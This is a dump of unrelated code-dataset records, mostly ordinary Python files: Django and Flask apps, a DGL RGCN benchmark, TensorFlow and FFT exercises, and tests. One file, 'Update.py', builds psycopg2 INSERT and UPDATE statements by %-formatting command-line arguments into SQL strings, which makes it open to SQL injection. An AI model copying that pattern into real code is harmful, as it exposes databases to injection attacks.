expressionCombinations:\n for item in sorted_x:\n expressionCombinations.write(\"%s\\t%s\\n\" % (item[0], item[1]))\n if item[0] == next_in:\n next_in += 1\n \n try:\n with open(str(DIGIT) + \"_CUMMULATIVE.txt\", \"r\") as expressionCombinations:\n for line in expressionCombinations:\n r = line.split()\n RESULT[int(r[0])] = r[1]\n except Exception:\n pass\n \n sorted_x = sorted(RESULT.items(), key=operator.itemgetter(0))\n next_in = RECORD_FROM\n with open(str(DIGIT) + \"_CUMMULATIVE.txt\", \"w\") as expressionCombinations:\n for item in sorted_x:\n expressionCombinations.write(\"%s\\t%s\\n\" % (item[0], item[1]))\n if item[0] == next_in:\n next_in += 1\n \n else: \n sorted_x = sorted(RESULT.items(), key=operator.itemgetter(0))\n next_in = RECORD_FROM\n with open(str(DIGIT) + \"_INDEX\" + str(operandListIndex) + \".txt\", \"w\") as expressionCombinations:\n for item in sorted_x:\n expressionCombinations.write(\"%s\\t%s\\n\" % (item[0], item[1]))\n if item[0] == next_in:\n next_in += 1\n \n if next_in > NEXT_IN_SERIES:\n NEXT_IN_SERIES = next_in\n \n # re-init results\n RESULT = {}\n \n \nif __name__ == '__main__':\n execute()\n \n","sub_path":"single_digit_representation/single_digit_representation.py","file_name":"single_digit_representation.py","file_ext":"py","file_size_in_byte":17247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414799119","text":"#imports\n\nimport time\nimport random\nimport logging\nimport sys\n\nfrom argparse import ArgumentParser, RawTextHelpFormatter\n\n\nimport psycopg2\nfrom psycopg2.errors import SerializationFailure\n\n\n\n\n\n#NAME-ID\n#METHOD TO CREATE NEW USER IN DB\ndef create_new_user(conn, ID, NAME):\n\n with conn.cursor() as cur:\n cur.execute(\n \"INSERT INTO Players (ID, Name) VALUES ('%s', '%s')\" % (ID,NAME)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n#METHOD TO UPDATE USER IN DB\ndef update_user(conn, ID, NAME):\n with conn.cursor() as cur:\n cur.execute(\n \"UPDATE Players SET Name ='%s' WHERE ID='%s'\" % (NAME, ID)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\n\n#TITLE-TAGS-DESCRIPTION-ID-HOST\n#METHOD TO CREATE NEW GAME IN DB\ndef create_new_Game(conn, ID, title, description, tags, host):\n with conn.cursor() as cur:\n cur.execute(\n \"INSERT INTO Games (ID, title, description, tags, host) VALUES ('%s', '%s', '%s', '%s', '%s')\" % (ID, title, description, tags, host)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n#METHOD TO UPDATE GAME IN DB\ndef update_Game(conn, ID, title, description, tags, host):\n with conn.cursor() as cur:\n cur.execute(\n \"UPDATE Games SET title='%s', description='%s', tags='%s', host='%s' WHERE ID='%s'\" % (title, description, tags, host, ID)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\n\n\n#TITLE-TAG-HASSCORED-VALUE-ID\n#METHOD TO CREATE NEW TAG IN DB\ndef create_new_tag(conn, ID, title, tag, value, hasScored):\n value = int(value)\n with conn.cursor() as cur:\n cur.execute(\n \"INSERT INTO Tags (ID, title, tag, value, hasScored) VALUES ('%s', '%s', '%s', %d, '%s')\" % (ID, title, tag, value, hasScored)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\n#METHOD TO UPDATE TAG IN DB\ndef update_tag(conn, ID, title, tag, value, hasScored):\n value = int(value)\n with 
conn.cursor() as cur:\n        cur.execute(\n            \"UPDATE Tags SET title='%s', tag='%s', value=%d, hasScored='%s' WHERE ID='%s'\" % (title, tag, value, hasScored, ID)\n        )\n\n    logging.debug(\"update_tag(): status message: %s\", cur.statusmessage)\n    conn.commit()\n\n\n\nif __name__ == \"__main__\":\n\n\n    conn = psycopg2.connect(\n        user='root',\n        database='defaultdb',\n        port=26257,\n        host='localhost')\n\n\n#players table\n#runs when first arg=='Players'\n    if (sys.argv[1]=='Players'):\n\n        Param1=sys.argv[2]\n        Param2=sys.argv[3]\n\n        create_new_user(conn, Param1, Param2)\n\n#update players table\n#runs when first arg=='PlayersUpdate'\n#update_user takes only an ID and a Name, so pass exactly two parameters\n    if (sys.argv[1]=='PlayersUpdate'):\n\n        Param1=sys.argv[2]\n        Param2=sys.argv[3]\n\n        update_user(conn, Param1, Param2)\n\n\n#tags table\n#runs when first arg=='Tags'\n    if (sys.argv[1]=='Tags'):\n\n        Param1=sys.argv[2]\n        Param2=sys.argv[3]\n        Param3=sys.argv[4]\n        Param4=sys.argv[5]\n        Param5=sys.argv[6]\n\n        create_new_tag(conn, Param1, Param2, Param3, Param4, Param5)\n\n#update Tags table\n#runs when first arg=='TagsUpdate'\n    if (sys.argv[1]=='TagsUpdate'):\n\n        Param1=sys.argv[2]\n        Param2=sys.argv[3]\n        Param3=sys.argv[4]\n        Param4=sys.argv[5]\n        Param5=sys.argv[6]\n\n        update_tag(conn, Param1, Param2, Param3, Param4, Param5)\n\n\n\n\n#game table\n#runs when first arg=='Game'\n    if (sys.argv[1]=='Game'):\n\n        Param1=sys.argv[2]\n        Param2=sys.argv[3]\n        Param3=sys.argv[4]\n        Param4=sys.argv[5]\n        Param5=sys.argv[6]\n\n        create_new_Game(conn, Param1, Param2, Param3, Param4, Param5)\n\n#update games table\n#runs when first arg=='GameUpdate'\n    if (sys.argv[1]=='GameUpdate'):\n\n        Param1=sys.argv[2]\n        Param2=sys.argv[3]\n        Param3=sys.argv[4]\n        Param4=sys.argv[5]\n        Param5=sys.argv[6]\n\n        update_Game(conn, Param1, Param2, Param3, Param4, Param5)\n","sub_path":"py scripts/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"126820845","text":"# 🚨 Don't change the code below 👇\r\nage = input(\"What is your current age?\")\r\n# 🚨 Don't change the code above 👆\r\n\r\n#Write your code below this line 👇\r\n\r\nage_left = 90 - int(age)\r\n\r\nx = int(age_left) * 365\r\ny = int(age_left) * 52\r\nz = int(age_left) * 12\r\n\r\nprint(f\"You have {x} days, {y} weeks, and {z} months left.\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Day 2/your_life_in_a_week.py","file_name":"your_life_in_a_week.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"369142711","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'shows'\n\nurlpatterns = [\n    # Main Shows app URLS\n\n    # Shows Index\n    path('', views.IndexView.as_view(), name='index'),\n\n    # Individual Show Url\n    path('/', views.DetailView.as_view(), name='show'),\n\n    # Radio List Url\n    path('all-radio', views.RadioView.as_view(), name='station'),\n\n    # Individual Radio Url\n    path('station//', views.StationView.as_view(), name='stations')\n\n]\n","sub_path":"shows/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"102154899","text":"stores = [\n    {\"name\": \"first\", \"items\" : [{\"name\" : \"My item\", \"price\" : 19.99}]}\n    , {\"name\": \"second\", \"items\": [{\"name\": \"My second item\",\"price\": 16.99}]}\n]\n\ndict_list = [\n    {\"key\":\"value\", \"item\": [{\"two\":\"four\"}]}\n    , {\"key2\":\"value2\", \"item2\": [{\"three\":\"five\"}]}\n]\n\nprint(dict_list[0][\"item\"])","sub_path":"old_session/section3_FlaskBasic/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"27168589","text":"# coding: utf-8\nimport sys\n\nsr = lambda: sys.stdin.readline().rstrip()\nir = lambda: int(sr())\nlr = lambda: list(map(int, sr().split()))\n\nN, M = lr()\nAB = [lr() for _ in range(M)]\nAB.sort(key=lambda x: [x[0], x[1]])\ncur = 0\nanswer = 0\nfor a, b in AB:\n    if a >= cur:\n        answer += 1\n        cur = b\n    if b < cur:\n        cur = b\n\nprint(answer)\n","sub_path":"Python_codes/p03295/s094425832.py","file_name":"s094425832.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"143277989","text":"import socket\nimport sys\n\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = socket.gethostname()\nport = 9999\nserversocket.bind((host, port))\nserversocket.listen(5)\nclientsocket, addr = serversocket.accept()\nwhile True:\n    print(\"Connection address: %s\" % str(addr))\n    print(clientsocket.recv(1024))\n    msg = input('sr:')\n    clientsocket.send(msg.encode('utf-8'))","sub_path":"homework9/r03(3).py","file_name":"r03(3).py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"466847353","text":"#The correlation function f (star) g is integral of f(x)g(x+y). Through a similar\n#proof, one can show f(star) g=ift(dft(f)*conj(dft(g))). Write a routine to\n#take the correlation function of two arrays. Plot the correlation\n#function of a Gaussian with itself. 
\n\nfrom numpy.fft import fft,ifft\nimport numpy\nfrom matplotlib import pyplot as plt\n\ndef mycorr(x,y):\n assert(x.size==y.size) #if the vectors are different sizes, get grumpy\n xft=fft(x)\n yft=fft(y)\n yftconj=numpy.conj(yft)\n return numpy.real(ifft(xft*yftconj))\n\nif __name__=='__main__':\n x=numpy.arange(-20,20,0.1)\n sigma=2\n y=numpy.exp(-0.5*x**2/sigma**2)\n \n ycorr=mycorr(y,y)\n plt.plot(x,ycorr)\n plt.show()\n \n\n\n\n","sub_path":"tut2.py","file_name":"tut2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"524548431","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\n\r\ndef change_feature_x(feature):\r\n result = np.array([])\r\n flag = True\r\n for sample_index in range(feature.shape[2]):\r\n row = np.array([])\r\n for row_index in range(feature.shape[0]):\r\n if row_index == 0:\r\n row = feature[row_index, :, sample_index]\r\n else:\r\n row = np.hstack((row, feature[row_index, :, sample_index]))\r\n \r\n if flag:\r\n result = row\r\n flag = False\r\n else:\r\n result = np.vstack((result, row)) \r\n \r\n return result\r\n \r\n \r\ndef change_label_t(feature):\r\n result = np.zeros((feature.shape[0], 10))\r\n for i in range(feature.shape[0]):\r\n result[i, feature[i, 0]] = 1\r\n \r\n return result\r\n \r\n\r\nwith np.load(\"notMNIST.npz\") as data:\r\n images, labels = data[\"images\"], data[\"labels\"]\r\n\r\n\r\n#x_train_org = images[:, :, :15000]\r\n#x_train = change_feature_x(x_train_org)\r\nx_train = np.load(\"x_train.npy\")\r\n#t_train_org = labels[: 15000, :]\r\n#t_train = change_label_t(t_train_org)\r\nt_train = np.load(\"t_train.npy\")\r\n\r\n#x_validation_org = images[:, :, 15000: 16000]\r\n#x_validation = change_feature_x(x_validation_org)\r\nx_validation = np.load(\"x_validation.npy\")\r\n#t_validation_org = labels[15000: 16000, :]\r\n#t_validation = change_label_t(t_validation_org)\r\nt_validation = np.load(\"t_validation.npy\")\r\n\r\n#x_test_org = images[:, :, 16000:]\r\n#x_test = change_feature_x(x_test_org)\r\nx_test = np.load(\"x_test.npy\")\r\n#t_test_org = labels[16000: , :]\r\n#t_test = change_label_t(t_test_org)\r\nt_test = np.load(\"t_test.npy\")\r\n\r\nx = tf.placeholder(\"float\", shape=[None, 784])\r\ny_ = tf.placeholder(\"float\", shape=[None, 10])\r\n\r\nW = tf.Variable(tf.zeros([784,10]))\r\nb = tf.Variable(tf.zeros([10]))\r\n\r\nsess = tf.InteractiveSession()\r\nsess.run(tf.initialize_all_variables())\r\n\r\ny = tf.nn.softmax(tf.matmul(x,W) + b)\r\n\r\ncross_entropy = -tf.reduce_sum(y_*tf.log(y))\r\n\r\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\r\n\r\nfor i in range(1000):\r\n #batch = mnist.train.next_batch(50)\r\n train_step.run(feed_dict={x: x_train, y_: t_train})\r\n\r\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\r\n\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\r\n\r\nprint (accuracy.eval(feed_dict={x: x_train, y_: t_train}))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ML/A2/t _00.py","file_name":"t _00.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34169657","text":"import math\n\nfrom calculator import Calculator\n\n\ndef test_calc_simple():\n calc = Calculator()\n assert(calc.operators['PLUSS'].execute(7, 3) == 10)\n assert(calc.operators['PLUSS'].execute(1, 
calc.operators['GANGE'].execute(2, 3)) == 7)\n\n\ndef test_eval_output_queue():\n calc = Calculator()\n calc.output_queue.push(1)\n calc.output_queue.push(2)\n calc.output_queue.push(3)\n calc.output_queue.push(calc.operators['GANGE'])\n calc.output_queue.push(calc.operators['PLUSS'])\n calc.output_queue.push(calc.functions['EXP'])\n assert(math.isclose(calc.evaluate_output_queue(), 1096.633158))\n\n\ndef test_eval_input_queue():\n calc = Calculator()\n calc.input_queue.push(calc.functions['EXP'])\n calc.input_queue.push('(')\n calc.input_queue.push(1)\n calc.input_queue.push(calc.operators['PLUSS'])\n calc.input_queue.push(2)\n calc.input_queue.push(calc.operators['GANGE'])\n calc.input_queue.push(3)\n calc.input_queue.push(')')\n\n calc.evaluate_input_queue()\n\n assert(calc.output_queue.pop() == 1)\n assert (calc.output_queue.pop() == 2)\n assert (calc.output_queue.pop() == 3)\n assert (calc.output_queue.pop() == calc.operators['GANGE'])\n assert (calc.output_queue.pop() == calc.operators['PLUSS'])\n assert (calc.output_queue.pop() == calc.functions['EXP'])\n\n calc2 = Calculator()\n calc2.input_queue.push(2)\n calc2.input_queue.push(calc2.operators['GANGE'])\n calc2.input_queue.push(3)\n calc2.input_queue.push(calc2.operators['PLUSS'])\n calc2.input_queue.push(1)\n\n calc2.evaluate_input_queue()\n\n assert(calc2.output_queue.pop() == 2)\n assert (calc2.output_queue.pop() == 3)\n assert (calc2.output_queue.pop() == calc2.operators['GANGE'])\n assert (calc2.output_queue.pop() == 1)\n assert (calc2.output_queue.pop() == calc2.operators['PLUSS'])\n\ndef test_parser():\n calc = Calculator()\n calc.parser(\"EXP(1 pluss 2 gange 3)\")\n\n\ndef test_calculator():\n calc = Calculator()\n txt = \"EXP(1 pluss 2 gange 3)\"\n assert(math.isclose(calc.calculate_expression(txt), 1096.633158))\n\n txt = \"((15 DELE (7 MINUS (1 PLUSS 1))) GANGE 3) MINUS (2 PLUSS (1 PLUSS 1))\"\n assert(math.isclose(calc.calculate_expression(txt), 5))\n\n\ndef test_calculator_custom():\n calc = Calculator()\n txt = \"EXP(SIN(2) PLUSS 10)\"\n y = calc.calculate_expression(txt)\n\n","sub_path":"tests/test_calculator.py","file_name":"test_calculator.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116346905","text":"import itertools\nimport time\n\nimport dgl\nimport dgl.nn.pytorch as dglnn\nimport torch as th\nimport torch.multiprocessing as mp\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom dgl.nn import RelGraphConv\nfrom torch.utils.data import DataLoader\n\nfrom .. import utils\n\n\nclass EntityClassify(nn.Module):\n \"\"\"Entity classification class for RGCN\n Parameters\n ----------\n device : int\n Device to run the layer.\n num_nodes : int\n Number of nodes.\n h_dim : int\n Hidden dim size.\n out_dim : int\n Output dim size.\n num_rels : int\n Numer of relation types.\n num_bases : int\n Number of bases. 
If is none, use number of relations.\n num_hidden_layers : int\n Number of hidden RelGraphConv Layer\n dropout : float\n Dropout\n use_self_loop : bool\n Use self loop if True, default False.\n \"\"\"\n\n def __init__(\n self,\n device,\n num_nodes,\n h_dim,\n out_dim,\n num_rels,\n num_bases=None,\n num_hidden_layers=1,\n dropout=0,\n use_self_loop=False,\n layer_norm=False,\n ):\n super(EntityClassify, self).__init__()\n self.device = device\n self.num_nodes = num_nodes\n self.h_dim = h_dim\n self.out_dim = out_dim\n self.num_rels = num_rels\n self.num_bases = None if num_bases < 0 else num_bases\n self.num_hidden_layers = num_hidden_layers\n self.dropout = dropout\n self.use_self_loop = use_self_loop\n self.layer_norm = layer_norm\n\n self.layers = nn.ModuleList()\n # i2h\n self.layers.append(\n RelGraphConv(\n self.h_dim,\n self.h_dim,\n self.num_rels,\n \"basis\",\n self.num_bases,\n activation=F.relu,\n self_loop=self.use_self_loop,\n dropout=self.dropout,\n layer_norm=layer_norm,\n )\n )\n # h2h\n for idx in range(self.num_hidden_layers):\n self.layers.append(\n RelGraphConv(\n self.h_dim,\n self.h_dim,\n self.num_rels,\n \"basis\",\n self.num_bases,\n activation=F.relu,\n self_loop=self.use_self_loop,\n dropout=self.dropout,\n layer_norm=layer_norm,\n )\n )\n # h2o\n self.layers.append(\n RelGraphConv(\n self.h_dim,\n self.out_dim,\n self.num_rels,\n \"basis\",\n self.num_bases,\n activation=None,\n self_loop=self.use_self_loop,\n layer_norm=layer_norm,\n )\n )\n\n def forward(self, blocks, feats, norm=None):\n if blocks is None:\n # full graph training\n blocks = [self.g] * len(self.layers)\n h = feats\n for layer, block in zip(self.layers, blocks):\n block = block.to(self.device)\n h = layer(block, h, block.edata[\"etype\"], block.edata[\"norm\"])\n return h\n\n\nclass RelGraphEmbedLayer(nn.Module):\n r\"\"\"Embedding layer for featureless heterograph.\n Parameters\n ----------\n device : int\n Device to run the layer.\n num_nodes : int\n Number of nodes.\n node_tides : tensor\n Storing the node type id for each node starting from 0\n num_of_ntype : int\n Number of node types\n input_size : list of int\n A list of input feature size for each node type. 
If None, we then\n treat certain input feature as an one-hot encoding feature.\n embed_size : int\n Output embed size\n embed_name : str, optional\n Embed name\n \"\"\"\n\n def __init__(\n self,\n device,\n num_nodes,\n node_tids,\n num_of_ntype,\n input_size,\n embed_size,\n sparse_emb=False,\n embed_name=\"embed\",\n ):\n super(RelGraphEmbedLayer, self).__init__()\n self.device = device\n self.embed_size = embed_size\n self.embed_name = embed_name\n self.num_nodes = num_nodes\n self.sparse_emb = sparse_emb\n\n # create weight embeddings for each node for each relation\n self.embeds = nn.ParameterDict()\n self.num_of_ntype = num_of_ntype\n self.idmap = th.empty(num_nodes).long()\n\n for ntype in range(num_of_ntype):\n if input_size[ntype] is not None:\n input_emb_size = input_size[ntype].shape[1]\n embed = nn.Parameter(th.Tensor(input_emb_size, self.embed_size))\n nn.init.xavier_uniform_(embed)\n self.embeds[str(ntype)] = embed\n\n self.node_embeds = th.nn.Embedding(\n node_tids.shape[0], self.embed_size, sparse=self.sparse_emb\n )\n nn.init.uniform_(self.node_embeds.weight, -1.0, 1.0)\n\n def forward(self, node_ids, node_tids, type_ids, features):\n \"\"\"Forward computation\n Parameters\n ----------\n node_ids : tensor\n node ids to generate embedding for.\n node_tids : tensor\n node type ids\n features : list of features\n list of initial features for nodes belong to different node type.\n If None, the corresponding features is an one-hot encoding feature,\n else use the features directly as input feature and matmul a\n projection matrix.\n Returns\n -------\n tensor\n embeddings as the input of the next layer\n \"\"\"\n tsd_ids = node_ids.to(self.node_embeds.weight.device)\n embeds = th.empty(\n node_ids.shape[0], self.embed_size, device=self.device\n )\n for ntype in range(self.num_of_ntype):\n if features[ntype] is not None:\n loc = node_tids == ntype\n embeds[loc] = features[ntype][type_ids[loc]].to(\n self.device\n ) @ self.embeds[str(ntype)].to(self.device)\n else:\n loc = node_tids == ntype\n embeds[loc] = self.node_embeds(tsd_ids[loc]).to(self.device)\n\n return embeds\n\n\n@utils.benchmark(\"time\", 600)\n@utils.parametrize(\"data\", [\"am\", \"ogbn-mag\"])\ndef track_time(data):\n dataset = utils.process_data(data)\n device = utils.get_bench_device()\n\n if data == \"am\":\n batch_size = 64\n n_bases = 40\n l2norm = 5e-4\n elif data == \"ogbn-mag\":\n batch_size = 1024\n n_bases = 2\n l2norm = 0\n else:\n raise ValueError()\n\n fanouts = [25, 15]\n n_layers = 2\n n_hidden = 64\n dropout = 0.5\n use_self_loop = True\n lr = 0.01\n num_workers = 4\n iter_start = 3\n iter_count = 10\n\n hg = dataset[0]\n category = dataset.predict_category\n num_classes = dataset.num_classes\n train_mask = hg.nodes[category].data.pop(\"train_mask\")\n train_idx = th.nonzero(train_mask, as_tuple=False).squeeze()\n labels = hg.nodes[category].data.pop(\"labels\").to(device)\n num_of_ntype = len(hg.ntypes)\n num_rels = len(hg.canonical_etypes)\n\n node_feats = []\n for ntype in hg.ntypes:\n if len(hg.nodes[ntype].data) == 0 or \"feat\" not in hg.nodes[ntype].data:\n node_feats.append(None)\n else:\n feat = hg.nodes[ntype].data.pop(\"feat\")\n node_feats.append(feat.share_memory_())\n\n # get target category id\n category_id = len(hg.ntypes)\n for i, ntype in enumerate(hg.ntypes):\n if ntype == category:\n category_id = i\n g = dgl.to_homogeneous(hg)\n u, v, eid = g.all_edges(form=\"all\")\n\n # global norm\n _, inverse_index, count = th.unique(\n v, return_inverse=True, return_counts=True\n )\n 
degrees = count[inverse_index]\n norm = th.ones(eid.shape[0]) / degrees\n norm = norm.unsqueeze(1)\n g.edata[\"norm\"] = norm\n g.edata[\"etype\"] = g.edata[dgl.ETYPE]\n g.ndata[\"type_id\"] = g.ndata[dgl.NID]\n g.ndata[\"ntype\"] = g.ndata[dgl.NTYPE]\n\n node_ids = th.arange(g.num_nodes())\n # find out the target node ids\n node_tids = g.ndata[dgl.NTYPE]\n loc = node_tids == category_id\n target_nids = node_ids[loc]\n train_nids = target_nids[train_idx]\n\n g = g.formats(\"csc\")\n sampler = dgl.dataloading.MultiLayerNeighborSampler(fanouts)\n loader = dgl.dataloading.DataLoader(\n g,\n target_nids[train_idx],\n sampler,\n batch_size=batch_size,\n shuffle=True,\n drop_last=False,\n num_workers=num_workers,\n )\n\n # node features\n # None for one-hot feature, if not none, it should be the feature tensor.\n #\n embed_layer = RelGraphEmbedLayer(\n device,\n g.num_nodes(),\n node_tids,\n num_of_ntype,\n node_feats,\n n_hidden,\n sparse_emb=True,\n )\n\n # create model\n # all model params are in device.\n model = EntityClassify(\n device,\n g.num_nodes(),\n n_hidden,\n num_classes,\n num_rels,\n num_bases=n_bases,\n num_hidden_layers=n_layers - 2,\n dropout=dropout,\n use_self_loop=use_self_loop,\n layer_norm=False,\n )\n\n embed_layer = embed_layer.to(device)\n model = model.to(device)\n\n all_params = itertools.chain(\n model.parameters(), embed_layer.embeds.parameters()\n )\n optimizer = th.optim.Adam(all_params, lr=lr, weight_decay=l2norm)\n emb_optimizer = th.optim.SparseAdam(\n list(embed_layer.node_embeds.parameters()), lr=lr\n )\n\n print(\"start training...\")\n model.train()\n embed_layer.train()\n\n # Enable dataloader cpu affinitization for cpu devices (no effect on gpu)\n with loader.enable_cpu_affinity():\n for step, sample_data in enumerate(loader):\n input_nodes, output_nodes, blocks = sample_data\n feats = embed_layer(\n input_nodes,\n blocks[0].srcdata[\"ntype\"],\n blocks[0].srcdata[\"type_id\"],\n node_feats,\n )\n logits = model(blocks, feats)\n seed_idx = blocks[-1].dstdata[\"type_id\"]\n loss = F.cross_entropy(logits, labels[seed_idx])\n optimizer.zero_grad()\n emb_optimizer.zero_grad()\n\n loss.backward()\n optimizer.step()\n emb_optimizer.step()\n\n # start timer at before iter_start\n if step == iter_start - 1:\n t0 = time.time()\n elif (\n step == iter_count + iter_start - 1\n ): # time iter_count iterations\n break\n\n t1 = time.time()\n\n return (t1 - t0) / iter_count\n","sub_path":"benchmarks/benchmarks/model_speed/bench_rgcn_homogeneous_ns.py","file_name":"bench_rgcn_homogeneous_ns.py","file_ext":"py","file_size_in_byte":10773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"302244323","text":"class Module:\n def __init__(self, funk, names: list, perms: str, access: list, template: str, desc: str, cost: int):\n self.names = names\n self.funk = funk\n self.perms = perms\n self.access = access\n self.template = template\n self.desc = desc\n self.cost = cost\n\n\nclass Filter:\n def __init__(self, funk, name: str, desc: str):\n self.funk = funk\n self.name = name\n self.desc = desc\n","sub_path":"Module_struct.py","file_name":"Module_struct.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"490459937","text":"from flask import Flask, g\nimport sqlite3\nfrom flask import render_template\nfrom flask import request, session, url_for, redirect, abort, g, flash, _app_ctx_stack\n\n\n# -- leave these lines intact 
--\napp = Flask(__name__)\n\n\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n db_name = app.config.get('DATABASE', 'squawker.db')\n g.sqlite_db = sqlite3.connect(db_name)\n\n return g.sqlite_db\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Creates the database tables.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, 'sqlite_db', None)\n if db is not None:\n db.close()\n# ------------------------------\n# @app.route('/')\n# def root():\n# conn = get_db()\n# #TODO change this\n# return \"Hello, post a new squawk!\"\n\n\n@app.route('/', methods=[\"POST\", \"GET\"])\ndef root():\n conn = get_db()\n c = conn.cursor()\n if request.method == 'POST':\n new_msg = request.form.get('msg')\n if len(new_msg) > 140:\n return \"Length error! Reduce length of squawk to 140 characters or less.\", 400\n else:\n query = \"INSERT INTO squawker (squawk) VALUES (?)\"\n c.execute(query, [new_msg])\n conn.commit()\n selectquery = \"SELECT squawk FROM squawker order by id DESC\"\n c.execute(selectquery)\n all = c.fetchall()\n c.close()\n return render_template(\"form.html\", squawks=all)\n# @app.route('/') #set default?\n# @app.route('/', method=[\"GET\",\"POST\"])\n#\n# def root(page):\n# return render_template('form.html')\n# @app.route('/hello')\n# def hello():\n# return 'Hello, World'\n# @app.route('/user/')\n# def show_user_profile(username):\n# # show the user profile for that user\n# return 'User %s' % username\n\n# @app.route('/post/')\n# def show_post(post_id):\n# # show the post with the given id, the id is an integer\n# return 'Post %d' % post_id\n\n\n# @app.route('/login', methods=['GET', 'POST'])\n# def login():\n# if request.method == 'POST':\n# do_the_login()\n# else:\n# show_the_login_form()\n\n\n# #@app.route('/hello/')\n# @app.route('/hello/')\n\n# def hello(name=None):\n# return render_template('hello.html', name=name)\n\n\n# with app.test_request_context('/hello', method='POST'):\n# # now you can do something with the request until the\n# # end of the with block, such as basic assertions:\n# assert request.path == '/hello'\n# assert request.method == 'POST'\n\n\n# # To record whatever is submitted via the form.\n# @app.route('/add_message', methods=['POST'])\n# def add_message():\n# \"\"\"Registers a new message for the user.\"\"\"\n# # if 'user_id' not in session:\n# # abort(401)\n# if request.form['text']:\n# db = get_db()\n# db.execute('''insert into message (text, pub_date) values (?, ?)''', (request.form['text'], int(time.time())))\n# db.commit()\n# flash('Your message was recorded')\n# return redirect(url_for('timeline'))\n\n\n# # To display everything that has been submitted by the form.\n# @app.route('/public')\n# def public_timeline():\n# \"\"\"Displays the latest messages of all users.\"\"\"\n# return render_template('timeline.html', messages=query_db('''\n# select message.* from message where order by message.pub_date desc limit ?''', [PER_PAGE]))\n\n# #Is this necessary? The previous function effectively does the work.\n# @app.route('/')\n# def timeline():\n# \"\"\"Shows a users timeline or if no user is logged in it will\n# redirect to the public timeline. 
This timeline shows the user's\n#     messages as well as all the messages of followed users.\n#     \"\"\"\n#     return render_template('timeline.html', messages=query_db('''select message.* from message\n#         where\n#         order by message.pub_date desc limit ?''',\n#         [PER_PAGE]))\n\n# if __name__ == '__main__':\n#     app.run()\n","sub_path":"squawker/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"506249346","text":"import locale\nfrom decimal import Decimal\n\nfrom django import template\nregister = template.Library()\n\ndef warning(value):\n    if value:\n        return '' + value[0] + '' + value[1:]\n    return value\n\n\ndef money_format(value):\n    return format(value, '0,.2f')\n\ndef accounting(value, place=2):\n    try:\n        place = int(place)\n    except:\n        place = 2\n\n    try:\n        value = Decimal(value)\n        locale.setlocale(locale.LC_ALL, '')\n        return locale.format(\"%.*f\", (place, value), 1)\n    except Exception as e:\n        return value\n\nregister.filter('warning', warning)\nregister.filter('money_format', money_format)\nregister.filter('accounting', accounting)","sub_path":"oauth/templatetags/oauth_extras.py","file_name":"oauth_extras.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
